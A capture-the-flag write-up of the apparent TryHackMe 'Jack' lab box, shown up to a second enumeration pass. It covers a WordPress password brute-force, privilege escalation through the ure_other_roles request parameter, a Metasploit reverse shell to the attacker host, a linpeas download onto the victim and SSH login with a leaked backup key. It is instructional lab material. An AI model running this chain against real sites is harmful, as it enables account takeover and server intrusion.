Jack

In today’s Game we are going to explore hacking into a WordPress site to obtain low-privileged user access, then find credentials to pivot to a normal user on the box, and then enumerate to find some interesting things with Python that allow us to PrivEsc to root and own this box.

Initial Enumeration

Get a RustScan going:

✘ kali@kalia  ~/curr  rustscan -a $IP
[sudo] password for kali: 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.13.248:22
Open 10.10.13.248:80
[~] Starting Script(s)
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-11 23:04 UTC
Initiating Ping Scan at 23:04
Scanning 10.10.13.248 [2 ports]
Completed Ping Scan at 23:04, 0.27s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 23:04
Completed Parallel DNS resolution of 1 host. at 23:04, 0.01s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 23:04
Scanning 10.10.13.248 [2 ports]
Discovered open port 22/tcp on 10.10.13.248
Discovered open port 80/tcp on 10.10.13.248
Completed Connect Scan at 23:04, 0.28s elapsed (2 total ports)
Nmap scan report for 10.10.13.248
Host is up, received syn-ack (0.27s latency).
Scanned at 2023-11-11 23:04:00 UTC for 1s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds

Looks like this is WordPress v5.3.2.

There is a robots.txt Disallow entry for /wp-admin/.

Now checking out the website on port 80. Here is the page source:

<!doctype html>
<html lang="en-US">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="profile" href="https://gmpg.org/xfn/11">

    <title>Jack&#039;s Personal Site &#8211; Blog for Jacks writing adventures.</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Jack&#039;s Personal Site &raquo; Feed" href="http://jack.thm/index.php/feed/" />
<link rel="alternate" type="application/rss+xml" title="Jack&#039;s Personal Site &raquo; Comments Feed" href="http://jack.thm/index.php/comments/feed/" />
        <script type="text/javascript">
            window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/jack.thm\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3.2"}};
        </script>
        <style type="text/css">
img.wp-smiley,
img.emoji {
    display: inline !important;
    border: none !important;
    box-shadow: none !important;
    height: 1em !important;
    width: 1em !important;
    margin: 0 .07em !important;
    vertical-align: -0.1em !important;
    background: none !important;
    padding: 0 !important;
}
</style>
    <link rel='stylesheet' id='wp-block-library-css'  href='http://jack.thm/wp-includes/css/dist/block-library/style.min.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-theme-css'  href='http://jack.thm/wp-includes/css/dist/block-library/theme.min.css?ver=5.3.2' type='text/css' media='all' />
<link rel='stylesheet' id='online-portfolio-googleapis-css'  href='//fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i|Work+Sans:100,200,300,400,500,600,700,800,900' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-css'  href='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/font-awesome/css/all.min.css?ver=5.8.1' type='text/css' media='all' />
<link rel='stylesheet' id='bootstrap-css'  href='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/bootstrap/css/bootstrap.min.css?ver=4.2.1' type='text/css' media='all' />
<link rel='stylesheet' id='animate-css'  href='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/animate/animate.min.css?ver=3.5.2' type='text/css' media='all' />
<link rel='stylesheet' id='owlcarousel-css-css'  href='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/owlcarousel/assets/owl.carousel.min.css?ver=2.2.1' type='text/css' media='all' />
<link rel='stylesheet' id='lightbox-css'  href='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/lightbox/css/lightbox.min.css?ver=2.2.1' type='text/css' media='all' />
<link rel='stylesheet' id='online-portfolio-style-css'  href='http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2' type='text/css' media='all' />
<style id='online-portfolio-style-inline-css' type='text/css'>
</style>
<link rel='stylesheet' id='online-portfolio-block-front-styles-css'  href='http://jack.thm/wp-content/themes/online-portfolio/inc/gutenberg/gutenberg-front.css?ver=1.0' type='text/css' media='all' />
<script type='text/javascript' src='http://jack.thm/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script type='text/javascript' src='http://jack.thm/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/js/theia-sticky-sidebar.js?ver=4.5.0'></script>
<link rel='https://api.w.org/' href='http://jack.thm/index.php/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://jack.thm/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://jack.thm/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.3.2" />
<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style></head>

<body class="home blog at-sticky-sidebar hfeed no-sidebar">

<div id="page" class="site">
    <a class="skip-link screen-reader-text" href="#content">
        Skip to content</a>

<!--==========================
  Header
============================-->


<header id="header">
        <div class="main-header">
        <div class="container-fluid">

            <div id="logo" class="pull-left">
                                        <h1 class="site-title">

                            <a href="http://jack.thm/" rel="home">Jack&#039;s Personal Site</a>
                        </h1>
                                            <p class="site-description">Blog for Jacks writing adventures.</p>
                                        <!-- Uncomment below if you prefer to use an image logo -->
                <!-- <a href="#intro"><img src="img/logo.png" alt="" title="" /></a>-->
            </div>

            <nav id="nav-menu-container">


            </nav><!-- #nav-menu-container -->
        </div>

    </div>
</header><!-- #header -->

<main id="main">


    <div class="inner-header-banner overlay bg-img"
         style="background-image: url(http://192.168.1.122/wp-content/uploads/2020/01/cropped-jacktypewriter.jpg);">
        <div class="container">
            <header class="section-header">

            <h3>Latest Blog</h3>



                    <div class="breadcrumbs">
                        <div class="container">
                            <div class="breadcrumb-trail breadcrumbs" arial-label="Breadcrumbs" role="navigation">
                                <ol class="breadcrumb trail-items">
                                    <li><nav role="navigation" aria-label="Breadcrumbs" class="breadcrumb-trail breadcrumbs" itemprop="breadcrumb"><h2 class="trail-browse">Browse</h2><ul class="trail-items" itemscope itemtype="http://schema.org/BreadcrumbList"><meta name="numberOfItems" content="1" /><meta name="itemListOrder" content="Ascending" /><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="trail-item trail-end"><span itemprop="name">Home</span><meta itemprop="position" content="1" /></li></ul></nav></li>
                                </ol>
                            </div>
                        </div>
                    </div>

            </header>
        </div>
    </div>

        <div id="content" class="site-content single-ample-page">
        <div class="container  clearfix">
                            <div class="row">                   <!-- Start primary content area -->
                    <div id="primary" class="content-area">
                        <main id="main" class="site-main" role="main">


<div class="col-md-12">
    <article id="post-9"
             class="post type-post status-publish has-post-thumbnail hentry" class="post-9 post type-post status-publish format-standard hentry category-uncategorized">

        <a class="post-thumbnail" href="#" aria-hidden="true" tabindex="-1">
                    </a>

        <header class="entry-header">
            <h3 class="entry-title">
                <a href="http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/" rel="bookmark">Jack is visiting Overlook Hotel in Colorado for some inspiration.</a>
            </h3>
            <div class="entry-meta">
                                            <span class="posted-on">Posted on
<a href="#" rel="bookmark">
    <time class="entry-date published updated" datetime="2018-11-25T04:36:26+00:00">January 10, 2020</time>
</a>
                                            </span>
                                                <span class="byline"> by
                                                    <span class="author vcard">
                                                    <a class="url fn n"
                                                       href="http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/">jack</a>
                                                </span>
                                            </span>
            </div><!-- .entry-meta -->
        </header><!-- .entry-header -->

        <div class="entry-content">
            <p>    Due to my recent writer&#8217;s block, I will be taking a bit of time for my family and myself at the Overlook Hotel, don&#8217;t think this will be just a vacation, I assure you, I will be working very hard&hellip;            </p>

            <a href="http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/"
               class="continue-link">Continue Reading</a>

        </div><!-- .entry-content -->

    </article>
</div>

                        </main><!-- #main -->
                    </div><!-- #primary -->

                    <div id="sidebar-primary secondary" class="widget-area sidebar" role="complementary">
                        <section  class="widget ">

<aside id="secondary" class="widget-area">
    <div class="side-bar1">
        <section id="search-2" class="widget widget_search"><form action="http://jack.thm" autocomplete="on" class="top-search">
    <input id="search" name="s" value="" type="text" placeholder="Search&hellip;&hellip;">
    <div class="search-button"><button type="submit">Search</button></div>
</form>
</section>        <section id="recent-posts-2" class="widget widget_recent_entries">      <h2 class="widget-title"><span>Recent Posts</span></h2>     <ul>
                                            <li>
                    <a href="http://jack.thm/index.php/2020/01/10/jack-is-visiting-overlook-hotel-in-colorado-for-some-inspiration/">Jack is visiting Overlook Hotel in Colorado for some inspiration.</a>
                                    </li>
                    </ul>
        </section><section id="recent-comments-2" class="widget widget_recent_comments"><h2 class="widget-title"><span>Recent Comments</span></h2><ul id="recentcomments"></ul></section><section id="archives-2" class="widget widget_archive"><h2 class="widget-title"><span>Archives</span></h2>     <ul>
                <li><a href='http://jack.thm/index.php/2020/01/'>January 2020</a></li>
        </ul>
            </section><section id="categories-2" class="widget widget_categories"><h2 class="widget-title"><span>Categories</span></h2>     <ul>
                <li class="cat-item cat-item-1"><a href="http://jack.thm/index.php/category/uncategorized/">Uncategorized</a>
</li>
        </ul>
            </section><section id="meta-2" class="widget widget_meta"><h2 class="widget-title"><span>Meta</span></h2>           <ul>
                        <li><a href="http://jack.thm/wp-login.php">Log in</a></li>
            <li><a href="http://jack.thm/index.php/feed/">Entries feed</a></li>
            <li><a href="http://jack.thm/index.php/comments/feed/">Comments feed</a></li>
            <li><a href="https://wordpress.org/">WordPress.org</a></li>           </ul>
            </section>  </div>
</aside><!-- #secondary -->
                        </section>
                    </div>

                </div>
            </div>
        </div>
</main>

    <footer id="footer">



        <div class="container">
            <div class="copyright">
                &copy; Copyright All Rights Reserved 2019           </div>
            <div class="credits">
                <a href="https://www.amplethemes.com/"
                > Design &amp; develop by AmpleThemes </a>
            </div>
        </div>
    </footer><!-- #footer -->

    <a href="#" class="back-to-top"><i class="fas fa-chevron-up"></i></a>
    <script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/bootstrap/js/bootstrap.bundle.min.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/easing/easing.min.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-includes/js/hoverIntent.min.js?ver=1.8.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/superfish/superfish.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/wow/wow.min.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/waypoints/waypoints.min.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/counterup/counterup.min.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/owlcarousel/owl.carousel.min.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/isotope/isotope.pkgd.min.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/lightbox/js/lightbox.min.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/lib/touchSwipe/jquery.touchSwipe.min.js?ver=4.2.1'></script>
<script type='text/javascript' src='http://jack.thm/wp-content/themes/online-portfolio/assets/js/main.js?ver=1.0.5'></script>
<script type='text/javascript' src='http://jack.thm/wp-includes/js/wp-embed.min.js?ver=5.3.2'></script>
</div>

    </body>
    </html>

Now to enumerate the WordPress site further. I see a possible username ‘jack’ as the author of this post.

Let me get a wpscan going.

 ✘ kali@kalia  ~/curr  wpscan -e u,ap --url http://jack.thm                                                       
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://jack.thm/ [10.10.13.248]
[+] Started: Sun Nov 12 08:30:35 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://jack.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://jack.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://jack.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://jack.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://jack.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://jack.thm/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
 |  - http://jack.thm/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: online-portfolio
 | Location: http://jack.thm/wp-content/themes/online-portfolio/
 | Last Updated: 2021-07-30T00:00:00.000Z
 | Readme: http://jack.thm/wp-content/themes/online-portfolio/readme.txt
 | [!] The version is out of date, the latest version is 0.1.0
 | Style URL: http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2
 | Style Name: Online Portfolio
 | Style URI: https://www.amplethemes.com/downloads/online-protfolio/
 | Description: Online Portfolio WordPress portfolio theme for building personal website. You can take full advantag...
 | Author: Ample Themes
 | Author URI: https://amplethemes.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 0.0.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2, Match: 'Version: 0.0.7'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:02 <==============================================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] jack
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://jack.thm/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] wendy
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] danny
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Nov 12 08:30:55 2023
[+] Requests Done: 59
[+] Cached Requests: 9
[+] Data Sent: 14.86 KB
[+] Data Received: 371.931 KB
[+] Memory used: 242.645 MB
[+] Elapsed time: 00:00:20

I see it found a few interesting things.

I made a users.txt file with the three users and then ran a brute-force password scan against them:

 kali@kalia  ~/curr  wpscan --url http://jack.thm/ -t 3 -U users.txt --passwords toplikeymunged.txt     
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://jack.thm/ [10.10.13.248]
[+] Started: Sun Nov 12 09:42:00 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://jack.thm/robots.txt
 | Interesting Entries:
 |  - /wp-admin/
 |  - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://jack.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://jack.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://jack.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://jack.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.3.2 identified (Insecure, released on 2019-12-18).
 | Found By: Rss Generator (Passive Detection)
 |  - http://jack.thm/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
 |  - http://jack.thm/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>

[+] WordPress theme in use: online-portfolio
 | Location: http://jack.thm/wp-content/themes/online-portfolio/
 | Last Updated: 2021-07-30T00:00:00.000Z
 | Readme: http://jack.thm/wp-content/themes/online-portfolio/readme.txt
 | [!] The version is out of date, the latest version is 0.1.0
 | Style URL: http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2
 | Style Name: Online Portfolio
 | Style URI: https://www.amplethemes.com/downloads/online-protfolio/
 | Description: Online Portfolio WordPress portfolio theme for building personal website. You can take full advantag...
 | Author: Ample Themes
 | Author URI: https://amplethemes.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 0.0.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://jack.thm/wp-content/themes/online-portfolio/style.css?ver=5.3.2, Match: 'Version: 0.0.7'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:14 <=============================================> (137 / 137) 100.00% Time: 00:00:14

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - wendy / changelater                                                                                             
Trying danny / starwars Time: 00:02:06 <====================================             > (645 / 867) 74.39%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: wendy, Password: changelater

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Nov 12 09:44:25 2023
[+] Requests Done: 785
[+] Cached Requests: 39
[+] Data Sent: 363.358 KB
[+] Data Received: 445.969 KB
[+] Memory used: 283.125 MB
[+] Elapsed time: 00:02:24

Ok we found 1 password for Wendy.

NOTE: If you are struggling with this one. You won’t find the password with rockyou. In fact I finally used another wordlist that I created based on a munge of some of the most used passwords.

Initial Web Login

Logging in I see this:

So we aren’t a full administrator here. Since we cannot access some of the pages (the 404 template and so on), it may not be possible to upload a PHP reverse shell.

Checking for some exploits here. I saw a hint on the THM site about ‘ure_other_roles’.

Escalate to Web Admin

After doing a fair bit of reading, I found that the string refers to the User Role Editor plugin for WordPress. We can simply navigate to the profile page, open BurpSuite, and capture the request when we click Update Profile. Then, before forwarding, we append &ure_other_roles=administrator to the request body and forward all other requests:

Now we see we have access to the other pages:

While we are here let’s change the default user role for Wendy:

Now if we have to log back in we’ll have admin. I did try this once to be sure, and I got an email verification page, so I recommend you test this so your exploit won’t fail.

Initial Box Access

Now I’ll use the Metasploit wp_admin_shell_upload module to get a Meterpreter reverse shell:

 kali@kalia  ~/curr  msfconsole -q
msf6 > search wp_admin_shell

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/unix/webapp/wp_admin_shell_upload  2015-02-21       excellent  Yes    WordPress Admin Shell Upload


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_admin_shell_upload

msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_admin_shell_upload) > show options

Module options (exploit/unix/webapp/wp_admin_shell_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/
                                         using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.11.62    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress



View the full module info with the info, or info -d command.

msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD changelater
PASSWORD => changelater
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS http://jack.thm/
RHOSTS => http://jack.thm/
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME wendy
USERNAME => wendy
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST tun0
LHOST => 10.19.10.150
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.19.10.150:4444 
[*] Authenticating with WordPress using wendy:changelater...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURL /wp-admin
[!] Unknown datastore option: TARGETURL. Did you mean TARGET?
TARGETURL => /wp-admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wp-admin
TARGETURI => /wp-admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.19.10.150:4444 
[*] Authenticating with WordPress using wendy:changelater...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.19.10.150:4444 
[*] Authenticating with WordPress using wendy:changelater...
[-] Exploit aborted due to failure: no-access: Failed to authenticate with WordPress
[*] Exploit completed, but no session was created.
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

[*] Started reverse TCP handler on 10.19.10.150:4444 
[*] Authenticating with WordPress using wendy:changelater...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/gLvyBKxzbo/RrpHIxAzSU.php...
[*] Sending stage (39927 bytes) to 10.10.13.248
[+] Deleted RrpHIxAzSU.php
[+] Deleted gLvyBKxzbo.php
[+] Deleted ../gLvyBKxzbo
[*] Meterpreter session 1 opened (10.19.10.150:4444 -> 10.10.13.248:52428) at 2023-11-12 10:28:20 +0900


meterpreter > ls
[-] stdapi_fs_stat: Operation failed: 1
meterpreter > cd ..
meterpreter > ls
Listing: /var/www/html/wp-content/plugins
=========================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
042775/rwxrwxr-x  4096  dir   2020-01-11 06:00:27 +0900  akismet
100664/rw-rw-r--  2255  fil   2013-05-23 06:08:40 +0900  hello.php
100664/rw-rw-r--  28    fil   2014-06-06 00:59:14 +0900  index.php
042755/rwxr-xr-x  4096  dir   2020-01-10 22:35:54 +0900  user-role-editor

meterpreter > whoami
[-] Unknown command: whoami
meterpreter > who
[-] Unknown command: who
meterpreter > w
[-] Unknown command: w
meterpreter > shell
Process 2519 created.
Channel 0 created.

python -c 'import pty; pty.spawn("/bin/bash")'
www-data@jack:/var/www/html/wp-content/plugins$ 

First Flag

Now navigate to the user home:

www-data@jack:/home/jack$ ls
ls
reminder.txt  user.txt
www-data@jack:/home/jack$ cat user.txt
cat user.txt
0052f7829e48752f2e7bf50f1231548a

Ok we got the user flag.

Let’s Enumerate for something we can use to pivot or privesc.

Let’s set up a web server to serve linpeas.sh:

```bash
kali@kalia  ~/curr/source  cp /home/kali/Downloads/linpeas.sh .
kali@kalia  ~/curr/source  python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …
10.10.13.248 - - [12/Nov/2023 10:35:54] "GET /linpeas.sh HTTP/1.1" 200 -
```

Now on the victim:

```bash
cd /dev/shm
www-data@jack:/dev/shm$ wget http://10.19.10.150/linpeas.sh
wget http://10.19.10.150/linpeas.sh
--2023-11-11 19:35:54-- http://10.19.10.150/linpeas.sh
Connecting to 10.19.10.150:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 848317 (828K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh 100%[===================>] 828.43K 417KB/s in 2.0s

2023-11-11 19:35:57 (417 KB/s) - 'linpeas.sh' saved [848317/848317]

www-data@jack:/dev/shm$ ls
ls
linpeas.sh
www-data@jack:/dev/shm$ chmod +x linpeas.sh
chmod +x linpeas.sh
```

First User Access

After running that we find an SSH key:

```bash
╔══════════╣ Analyzing SSH Files (limit 70)

-rwxrwxrwx 1 root root 1675 Jan 10 2020 /var/backups/id_rsa
-----BEGIN RSA PRIVATE KEY-----
[..]
-----END RSA PRIVATE KEY-----
```

Now I drop that file on my local box:

 ✘ kali@kalia  ~/curr  cat ssh/id_rsa 
-----BEGIN RSA PRIVATE KEY-----
[..]
-----END RSA PRIVATE KEY-----

kali@kalia  ~/curr/ssh  chmod 0600 ssh/id_rsa

Now let’s try to use it to login and get a proper shell:

kali@kalia  ~/curr  ssh -i ssh/id_rsa jack@$IP                  
The authenticity of host '10.10.13.248 (10.10.13.248)' can't be established.
ED25519 key fingerprint is SHA256:91RPPbrI5UuL0FaDNrDEVlL+bIOB9YABCTtC3ttyW1U.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.13.248' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

143 packages can be updated.
92 updates are security updates.


Last login: Mon Nov 16 14:27:49 2020 from 10.11.12.223
jack@jack:~$ 

Second Enumeration

I run Linpeas again here as I am now properly logged in as the Jack user:

╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses                                     
